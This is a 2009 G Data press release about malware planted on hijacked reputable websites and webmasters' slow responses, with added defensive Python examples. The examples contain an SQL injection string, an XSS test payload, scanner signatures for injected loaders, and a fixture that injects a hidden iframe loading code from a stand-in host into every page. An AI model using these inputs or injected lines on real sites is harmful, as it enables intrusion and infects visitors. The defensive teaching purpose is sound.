Virus 'spray gun' websites: the risk of infection lurks everywhere

Website operators are sluggish about dealing with malware infections

10/08/2009 | Bochum (Germany) 

Beware the risk of infection: malware programs do not just lurk in the darker recesses of the Internet. German security software manufacturer G Data is paying careful attention to the trend in malware that can automatically install itself via 'drive-by download' without the user noticing - and that is being found more and more frequently on reputable websites. So how are the operators of the websites concerned responding? G Data put this to the test and contacted providers whose webservers have been distributing massive quantities of malware. The controversial conclusion: 45 percent of webmasters took several weeks to remove their malware 'spray guns' from the Internet - if they did at all.

As part of its Malware Information Initiative, G Data has been paying particular attention to the spread of malware across the Internet in recent months. The popularity of this method of distributing malware is evident from the fact that email has since been displaced as the main method of distribution. So how do online criminals manage to abuse reputable websites for their own purposes? Ralf Benzmueller, Head of G Data Security Labs, explains the three most popular methods used by perpetrators.

"Cyber criminals who are distributing their malware via hijacked websites exploit three major weaknesses: access to the webserver is often secured using weak passwords such as admin123. These can be cracked in seconds using so-called 'dictionary attacks' that run completely automatically," says Ralf Benzmueller.

But it is not just weak passwords that make it easy for online criminals to hijack websites. Attackers also frequently exploit weak spots in the webserver applications deployed to run e.g. online shops, content management systems or blog and forum software. "These frequently run in standard configurations or exhibit numerous security holes caused by insufficient updating. Special queries on search engines can be used to locate vulnerable computers very quickly, then automatically attack them and take them over. This makes it particularly important for webserver operators to carry out regular software updates. Unfiltered user entries, e.g. in website forms, provide another gateway that can be used for cross-site scripting attacks or SQL injections. Unfortunately, a sequence of filter modules provides insufficient protection and attackers are becoming ever more successful in using this method for injecting malware into websites."

Weak passwords, security holes in webserver software and inadequate filtering of user entries are just some of the ways that operators enable or make it easy for crooks to attack websites.
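As an added illustration of two of the weaknesses just listed (example code written for this page, not G Data's or any vendor's), the following Python script contrasts a login query that pastes user input straight into SQL with the parameterized form, escapes user-supplied text before it is rendered into HTML, and rejects passwords that appear on a small common-password list. The users table, the wordlist and all names are constructed for the example; the demo stores passwords in plain text only to keep the query comparison short, which a real system would never do.

```python
import html
import sqlite3

# Constructed shortlist standing in for the wordlists that automated dictionary attacks run through.
COMMON_PASSWORDS = {"admin", "admin123", "password", "123456", "qwerty", "letmein"}


def password_is_acceptable(pw, min_len=12):
    """Reject what a dictionary attack tries first: short passwords and anything on the common list."""
    return len(pw) >= min_len and pw.lower() not in COMMON_PASSWORDS


def build_demo_db():
    """Constructed sample database: a tiny users table standing in for a shop or CMS backend.
    Plain-text passwords are a simplification for the demo; real systems store salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret!"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_unfiltered(conn, name, pw):
    """Vulnerable form: user input becomes part of the query text, so it can change the query's logic."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name, pw):
    """Hardened form: the driver binds the values; input can never alter the query structure."""
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return [row[0] for row in conn.execute(sql, (name, pw))]


def render_comment(author, text):
    """Escape user text at the point it is written into HTML, so injected tags render as text."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


if __name__ == "__main__":
    db = build_demo_db()
    tampered = "' OR '1'='1"          # classic textbook input that rewrites the WHERE clause
    print("weak password accepted:", password_is_acceptable("admin123"))
    print("unfiltered query returns:", login_unfiltered(db, "alice", tampered))
    print("parameterized query returns:", login_parameterized(db, "alice", tampered))
    print(render_comment("visitor", "<script>alert(1)</script>"))
```

Running the script shows why the article's remark about filter modules holds: the concatenated query hands back every user for a tampered password, while the parameterized query returns nothing, without any input filtering at all. Output escaping works the same way for cross-site scripting: it does not try to recognise bad input, it makes every input harmless at the point of rendering.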

Despite a warning, no response after three weeks!
Many PC users have since become clearly aware of the dangers that lurk on the web. However they assume that attacks will not come from the sites of reputable providers such as hotels, action groups or web communities. As part of the G Data Malware Information Initiative, experts keep running into web servers from these sectors that are distributing malware. To render these centres of infection harmless, G Data regularly contacts the operators responsible. The German security specialist's experiences in doing so vary greatly. Of greatest concern is the sluggish reaction of those responsible: out of 100 website operators that G Data contacted in the context of this research, only 55 reacted within a week.

[Chart: the reaction time of the website operators]

"As soon as we discover malware on a website, we tell those responsible of the options we offer, to stop the malware from being spread as quickly as possible. But in many cases we have to report that the responses to this were extremely slow or non-existent. For example, we recently told a well-known sports retailer from Stuttgart that there was malware on their website. Three weeks later this computer virus was still active - we can only guess at how many users have had their PCs infected by it," continues Benzmueller. "We wish more website operators would take their responsibility towards the users of their website seriously. Anyone who does not want to be drawn into the machinations of online criminals needs to check their webserver regularly and, if necessary, respond quickly and effectively."

G Data security tips: 
The possibilities for manipulation are endless and it is not always easy for webmasters to track down the source of an infection. Websites are often constructed using different components. All it takes is for just one element of the site to be infected or for the construction of the website to be modified in such a way that a line of malware code can be added to each page.

Because of the increasing number of hacker attacks, G Data urgently recommends operators to check their webserver for viruses regularly and to respond as quickly as possible if they find one.

The options for perpetrators can be significantly reduced by observing the following tips:

  1. Security updates to the web application software should be installed promptly. This is the only way to close critical holes before they are exploited on a large scale. Unfortunately, the time between a patch being published and the first attack attempts can be very short.
  2. Antivirus programs should not be missing from any computer, and certainly not from a webserver. Care should also be taken that they are equipped with the most up-to-date virus signatures.
  3. Website operators should regularly check the offline versions of their site with a virus scanner. This way, even well hidden malware can be found quickly.
  4. If an infection should occur, web administrators should change all access passwords immediately. This stops attackers from simply returning to the server with the same credentials the following day.
  5. Users should be careful that their browser and plug-ins are always kept fully up-to-date. Antiquated programs ('software dinosaurs') often contain security holes that are used by perpetrators for smuggling in malware code.
  6. PC users should use virus protection that permanently checks the content of websites for malware. This enables malware to be quickly found and stopped before it reaches the browser.
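One way to act on tip 3 (scanning offline copies of the site) and on the observation above that a single line of malware code ends up added to every page: an added Python example, written for this page rather than taken from G Data or the press release, that walks a local snapshot of a website, flags lines matching a few constructed signatures for hidden iframes and obfuscated loaders, and diffs the snapshot's script and iframe lines against the webmaster's clean offline copy. The directory layout, page contents, the host name malware.example and the signature list are all constructed for the example.

```python
import os
import re
import tempfile

# Heuristic signatures for injected drive-by loaders. Constructed for this example; they
# complement, not replace, the up-to-date virus scanner the article recommends.
SIGNATURES = [
    ("hidden iframe", re.compile(
        r"<iframe[^>]*(width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b"
        r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)),
    ("obfuscated script", re.compile(r"\b(eval|document\.write)\s*\(\s*unescape\s*\(", re.I)),
    ("charcode decoder", re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}", re.I)),
]
WEB_EXTS = (".html", ".htm", ".php", ".js")
TAG_RX = re.compile(r"<(script|iframe)\b", re.I)
# Constructed injected line; the host name uses the reserved .example TLD.
INJECTED_LINE = '<iframe src="http://malware.example/load.php" width="0" height="0"></iframe>'


def _web_files(root):
    """Yield (relative path with '/' separators, absolute path) for every web file under root."""
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(WEB_EXTS):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def _read_lines(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return [line.rstrip("\n") for line in f]


def scan_signatures(root):
    """Return {relpath: [(line_no, label, excerpt), ...]} for every file that hits a signature."""
    report = {}
    for rel, full in _web_files(root):
        hits = [(no, label, line.strip()[:80])
                for no, line in enumerate(_read_lines(full), 1)
                for label, rx in SIGNATURES if rx.search(line)]
        if hits:
            report[rel] = hits
    return report


def diff_against_baseline(baseline_root, live_root):
    """Lines carrying a <script> or <iframe> tag that appear in the live snapshot but not in the
    webmaster's clean offline copy (a file absent from the baseline is compared against nothing)."""
    added = {}
    for rel, full in _web_files(live_root):
        base_path = os.path.join(baseline_root, rel)
        base = set(map(str.strip, _read_lines(base_path))) if os.path.exists(base_path) else set()
        new = [l.strip() for l in _read_lines(full) if TAG_RX.search(l) and l.strip() not in base]
        if new:
            added[rel] = new
    return added


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)


def build_demo_site():
    """Constructed sample: a clean offline copy and a live snapshot with the loader line injected
    into every page plus an obfuscated script dropped into the js/ directory."""
    clean, live = tempfile.mkdtemp(prefix="clean_"), tempfile.mkdtemp(prefix="live_")
    pages = {
        "index.html": '<html><body><h1>Hotel Demo</h1>\n<script src="/js/site.js"></script>\n</body></html>',
        "rooms/list.html": '<html><body><h2>Rooms</h2>\n<script src="/js/site.js"></script>\n</body></html>',
    }
    for rel, body in pages.items():
        _write(os.path.join(clean, rel), body)
        _write(os.path.join(live, rel), body.replace("</body>", INJECTED_LINE + "\n</body>"))
    _write(os.path.join(live, "js", "loader.js"), 'document.write(unescape("%3Cscript%3E..."));')
    return clean, live


if __name__ == "__main__":
    clean_dir, live_dir = build_demo_site()
    for rel, hits in scan_signatures(live_dir).items():
        for no, label, excerpt in hits:
            print(f"{rel}:{no}: {label}: {excerpt}")
    for rel, lines in diff_against_baseline(clean_dir, live_dir).items():
        print(f"{rel}: tag lines not present in the offline copy: {lines}")
```

The two checks cover each other's blind spots: the signature scan catches the obfuscated loader in js/loader.js, which contains no literal tag and so never shows up in the diff, while the baseline diff catches the iframe line that was stamped into every page even if a future campaign uses a host and markup no signature knows about. The diff is only as good as the baseline, so the offline copy has to be the webmaster's own master copy, never a fresh download from the server being checked.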

Thorsten Urbanski